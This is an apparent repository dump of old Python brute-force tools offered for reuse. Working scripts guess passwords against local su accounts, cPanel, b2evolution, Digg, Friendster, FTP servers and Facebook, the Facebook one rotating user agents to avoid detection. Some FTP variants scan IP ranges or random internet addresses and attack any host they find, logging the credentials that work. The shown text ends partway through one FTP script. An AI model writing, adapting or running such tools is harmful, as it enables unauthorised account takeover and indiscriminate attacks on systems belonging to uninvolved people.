Repository: rischanlab/bruteforce_py
Branch: master
Commit: 0dd738e64654
Files: 47
Total size: 110.2 KB
Directory structure:
gitextract_1xa3ojw4/
├── .gitattributes
├── .gitignore
├── README.md
├── accbrute.py
├── b2evobf.py
├── cPanelbrute.py
├── diggbf.py
├── dnsbrute.py
├── facebookbruteforcer.py
├── friendsterbf.py
├── ftpbrute.py
├── ftpbrute_iprange.py
├── ftpbrute_random.py
├── ftpbrute_random1.0.py
├── gmailbrute.py
├── gmailpopbrute.py
├── imapbrute.py
├── imapbrute_iprange.py
├── imapbrute_random.py
├── linksysbrute.py
├── locbrute.py
├── mysqlbrute.py
├── mysqlbrute_iprange.py
├── mysqlbrute_random.py
├── nntpbrute.py
├── nntpbrute_iprange.py
├── nntpbrute_random.py
├── popbrute.py
├── popbrute_iprange.py
├── popbrute_random.py
├── rootbrute.py
├── serenbf.py
├── smtpbrute.py
├── smtpbrute_iprange.py
├── smtpbrute_random.py
├── snmp_brute.py
├── sshbrute.py
├── sshbrute_fork.py
├── sshbrute_iprange.py
├── sshbrute_random.py
├── telnetbrute.py
├── telnetbrute_iprange.py
├── telnetbrute_random.py
├── webauthbrute.py
├── webauthbrute_random_usersupport.py
├── webminbrute.py
└── wordpressbf.py
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
# Auto detect text files and perform LF normalization
* text=auto
# Custom for Visual Studio
*.cs diff=csharp
*.sln merge=union
*.csproj merge=union
*.vbproj merge=union
*.fsproj merge=union
*.dbproj merge=union
# Standard to msysgit
*.doc diff=astextplain
*.DOC diff=astextplain
*.docx diff=astextplain
*.DOCX diff=astextplain
*.dot diff=astextplain
*.DOT diff=astextplain
*.pdf diff=astextplain
*.PDF diff=astextplain
*.rtf diff=astextplain
*.RTF diff=astextplain
================================================
FILE: .gitignore
================================================
#################
## Eclipse
#################
*.pydevproject
.project
.metadata
bin/
tmp/
*.tmp
*.bak
*.swp
*~.nib
local.properties
.classpath
.settings/
.loadpath
# External tool builders
.externalToolBuilders/
# Locally stored "Eclipse launch configurations"
*.launch
# CDT-specific
.cproject
# PDT-specific
.buildpath
#################
## Visual Studio
#################
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.vspscc
.builds
*.dotCover
## TODO: If you have NuGet Package Restore enabled, uncomment this
#packages/
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
# Visual Studio profiler
*.psess
*.vsp
# ReSharper is a .NET coding add-in
_ReSharper*
# Installshield output folder
[Ee]xpress
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish
# Others
[Bb]in
[Oo]bj
sql
TestResults
*.Cache
ClientBin
stylecop.*
~$*
*.dbmdl
Generated_Code #added for RIA/Silverlight projects
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
############
## Windows
############
# Windows image file caches
Thumbs.db
# Folder config file
Desktop.ini
#############
## Python
#############
*.py[co]
# Packages
*.egg
*.egg-info
dist
build
eggs
parts
bin
var
sdist
develop-eggs
.installed.cfg
# Installer logs
pip-log.txt
# Unit test / coverage reports
.coverage
.tox
#Translations
*.mo
#Mr Developer
.mr.developer.cfg
# Mac crap
.DS_Store
================================================
FILE: README.md
================================================
bruteforce_py
=============
All codes in this repo are not mine, last time I used this code for playing
all bruteforce with python, ssh bf, wordpress bf, cpanel bf, mysql bf, etc
You can fork, download, and using this code.
Thank you, :)
================================================
FILE: accbrute.py
================================================
#!/usr/bin/python
#Local Account BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys, pwd
try:
import pexpect
except(ImportError):
print "\nYou need the pexpect module."
print "http://www.noah.org/wiki/Pexpect\n"
sys.exit(1)
#Change this if needed.
LOGIN_ERROR = 'su: incorrect password'
def brute(word):
print "Trying:",word
child = pexpect.spawn ('su '+user)
child.expect ('Password: ')
child.sendline (word)
i = child.expect([LOGIN_ERROR, pexpect.TIMEOUT], timeout=5)
if i == 1:
print "\n\t[!] Password:",word
child.sendline ('whoami')
print child.before
child.interact()
#if i = 0:
#print "Incorrect Password"
if len(sys.argv) != 3:
print "\nUsage : ./accbrute.py "
print "Eg: ./accbrute.py d3hydr8 words.txt\n"
sys.exit(1)
user = sys.argv[1]
users = []
for x in pwd.getpwall():
users.append(x[0])
if user not in users:
print "\n[-] User not found\n"
sys.exit(1)
print "\n[+] Found:",len(users),"users"
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
sys.exit(1)
print "\n[+] Loaded:",len(words),"words"
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
brute(word.replace("\n",""))
================================================
FILE: b2evobf.py
================================================
#!/usr/bin/python
#b2evolution Brute Force (login.php)
#Change response on line 90 if needed. (language)
#Dork: inurl:"/htsrv/login.php" intitle:b2evo
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com b2evoBF v1.0"
print "--------------------------------------------"
if len(sys.argv) not in [4,5,6,7]:
print "Usage: ./b2evobf.py \n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('submit', 'Log in!')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
#Change this response if different. (language)
if re.search("ERROR:",site) and verbose == 1:
print "[-] Login Failed:",word
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
sys.exit(1)
print "\n[-] Brute Complete\n"
================================================
FILE: cPanelbrute.py
================================================
#!usr/bin/python
#cPanel BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, urllib2, httplib, base64
from copy import copy
def title():
print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"
print "\t-----------------------------------------------------\n"
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) !=5:
title()
print "\nUsage: ./cPanelbrute.py \n"
print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"
sys.exit(1)
try:
users = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return users[0], value[0][:-1]
else:
return users[0][:-1], value[0][:-1]
def getauth(url):
req = urllib2.Request(url)
try:
handle = urllib2.urlopen(req)
except IOError, e:
pass
else:
print "This page isn't protected by basic authentication.\n"
sys.exit(1)
if not hasattr(e, 'code') or e.code != 401:
print "\nThis page isn't protected by basic authentication."
print 'But we failed for another reason.\n'
sys.exit(1)
authline = e.headers.get('www-authenticate', '')
if not authline:
print '\nA 401 error without a basic authentication response header - very weird.\n'
sys.exit(1)
else:
return authline
class Worker(threading.Thread):
def run(self):
username, password = getword()
try:
print "-"*12
print "User:",username,"Password:",password
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
urllib2.urlopen(server)
print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"
except (urllib2.HTTPError, httplib.BadStatusLine), msg:
#print "An error occurred:", msg
pass
title()
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":2082"
if sys.argv[2].isdigit() == False:
print "[-] Port must be a number\n"
sys.exit(1)
else:
port = sys.argv[2]
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":"+port
print "[+] Server:",server
print "[+] Port:",port
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+]",getauth(server)
print "[+] Started",timer(),"\n"
for i in range(len(words)*len(users)):
work = Worker()
work.setDaemon(1)
work.start()
time.sleep(1)
print "\n[-] Done -",timer(),"\n"
================================================
FILE: diggbf.py
================================================
#!/usr/bin/python
#Digg.com Login BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com diggBF v1.0"
print "----------------------------------------------"
if len(sys.argv) not in [3,4,5,6]:
print "Usage: ./diggbf.py \n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
host = "http://digg.com/login"
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[1]
try:
words = open(sys.argv[2], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('username', sys.argv[1]),
('password', word),
('persistent', 'on'),
('submit', 'Login'),
('processlogin', '1'),
('returnpage', '/')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(host, proxy_handler)
else:
opener = urllib2.build_opener(host)
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("Whoops!
",site) == None:
print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
sys.exit(1)
else:
if verbose == 1:
print "[-] Login Failed:",word
print "\n[-] Brute Complete\n"
================================================
FILE: dnsbrute.py
================================================
#!usr/bin/python
#DNS Brute Forcer, uses wordlist to find subdomains.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket
from copy import copy
if len(sys.argv) !=3:
print "Usage: ./dnsbrute.py "
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com dnsBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
digger = value[:-1]+"."+sys.argv[1]
print "Trying:", digger
result = socket.getaddrinfo(digger, None, 0, socket.SOCK_STREAM)
print "\n\t\tWorked:",[x[4][0] for x in result][0]," Hostname:",digger
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
================================================
FILE: facebookbruteforcer.py
================================================
#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me ;)
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
__programmer__ = "gunslinger_ "
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...
Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy | Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help
Example : %s -u brad@hackme.com -w wordlist.txt"
P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]
def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)
def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()
def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))
def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()
if __name__ == '__main__':
main()
================================================
FILE: friendsterbf.py
================================================
#!/usr/bin/python
#Friendster.com Login BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com friendsterBF v1.1"
print "----------------------------------------------"
if len(sys.argv) not in [3,4,5,6]:
print "Usage: ./friendsterbf.py \n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
host = "http://www.friendster.com/login.php"
print "[+] BruteForcing:",host
print "[+] Email:",sys.argv[1]
try:
words = open(sys.argv[2], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('_submitted', '1'),
('next', '/'),
('tzoffset', '240'),
('email', sys.argv[1]),
('password', word),
('remembermyemail', 'on'),
('btnLogIn', 'Log In'),
('btnSignUp','Sign Up')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("The email address you entered is not a valid Friendster login.",site):
print "\nThe email address you entered is not a valid Friendster login.\n"
sys.exit(1)
if re.search("The email address and password you entered did not match.",site) == None:
print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
sys.exit(1)
else:
if verbose == 1:
print "[-] Login Failed:",word
print "\n[-] Brute Complete\n"
================================================
FILE: ftpbrute.py
================================================
#!usr/bin/python
#Ftp Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, ftplib
from ftplib import FTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./ftpbrute.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
try:
f = FTP(sys.argv[1])
print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
pass
try:
print "\n[+] Checking for anonymous login\n"
ftp = FTP(sys.argv[1])
ftp.login()
ftp.retrlines('LIST')
print "\t\nAnonymous login successful!!!\n"
ftp.quit()
except (ftplib.all_errors):
print "\tAnonymous login unsuccessful\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
ftp = FTP(sys.argv[1])
ftp.login(user, value)
ftp.retrlines('LIST')
print "\t\nLogin successful:",value, user
ftp.quit()
work.join()
sys.exit(2)
except (ftplib.all_errors), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
================================================
FILE: ftpbrute_iprange.py
================================================
#!usr/bin/python
#Ftp Brute Forcer, searches ip_range for hosts using ftp.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, ftplib, re
from ftplib import FTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./ftpbrute.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
wordlist = copy(words)
def scan():
iprange = sys.argv[1]
ip_list = []
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 21 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
ip_list.append(ipaddr[0])
return ip_list
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
ftp = FTP(ip)
ftp.login(user[:-1], value)
ftp.retrlines('LIST')
print "\t\nLogin successful:",user, value
ftp.quit()
work.join()
sys.exit(2)
except (ftplib.all_errors), msg:
#print "An error occurred:", msg
pass
ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
print "\n\tAttempting BruteForce:",ip,"\n"
try:
f = FTP(ip)
print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
pass
try:
print "\n[+] Checking for anonymous login\n"
ftp = FTP(ip)
ftp.login()
ftp.retrlines('LIST')
print "\t\nAnonymous login successful!!!\n"
ftp.quit()
except (ftplib.all_errors):
print "\tAnonymous login unsuccessful\n"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(1)
================================================
FILE: ftpbrute_random.py
================================================
#!usr/bin/python
#Uses nmap or socket to check if ftp is open on a random ip. If
#the server is found it will check for anonymous login and then
#continue to bruteforce. It also can save successful logins
#to an external file.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, ftplib, re, socket
from ftplib import FTP
def rand():
a = random.randrange(255) + 1
b = random.randrange(255) + 1
c = random.randrange(255) + 1
d = random.randrange(255) + 1
ip = "%d.%d.%d.%d" % (a,b,c,d)
return ip
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def nmapscan():
#Change this to your nmap preferences
nmap = "nmap -P0 -iR 1 -p 21 | grep open -B 3"
nmap = StringIO.StringIO(commands.getstatusoutput(nmap)[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
return ipaddr
def servscan():
ipaddr = rand()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((ipaddr, 21))
s.close()
return ipaddr
except socket.error:
pass
def workhorse(ipaddr, user, word):
user = user.replace("\n","")
word = word.replace("\n","")
try:
print "-"*12
print "User:",user,"Password:",word
ftp = FTP(ipaddr)
ftp.login(user, word)
ftp.retrlines('LIST')
print "\t\n[!] Login successful:",user, word
if txt != None:
save_file.writelines(user+" : "+word+" @ "+ipaddr+":21\n")
ftp.quit()
sys.exit(2)
except (ftplib.all_errors), msg:
#print "[-] An error occurred:", msg
pass
def brute(ipaddr):
print "-"*30
print "\n[+] Attempting BruteForce:",ipaddr,"\n"
try:
f = FTP(ipaddr)
print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
pass
try:
print "\n[+] Checking for anonymous login:",ipaddr,"\n"
ftp = FTP(ipaddr)
ftp.login()
ftp.retrlines('LIST')
print "\t\n[!] Anonymous login successful!!!\n"
if txt != None:
save_file.writelines("Anonymous:"+ipaddr+":21\n")
ftp.quit()
except (ftplib.all_errors):
print "[-] Anonymous login unsuccessful\n"
for user in users:
for word in words:
work = threading.Thread(target = workhorse, args=(ipaddr, user, word)).start()
time.sleep(1)
if len(sys.argv) not in [4,5,6,7]:
print "\nUsage: ./randftpbf.py "
print "\t[option]"
print "\t -nmap/-n : Uses sockets instead of nmap to find open ports"
print "\t -save/-s : Save Successful Logins"
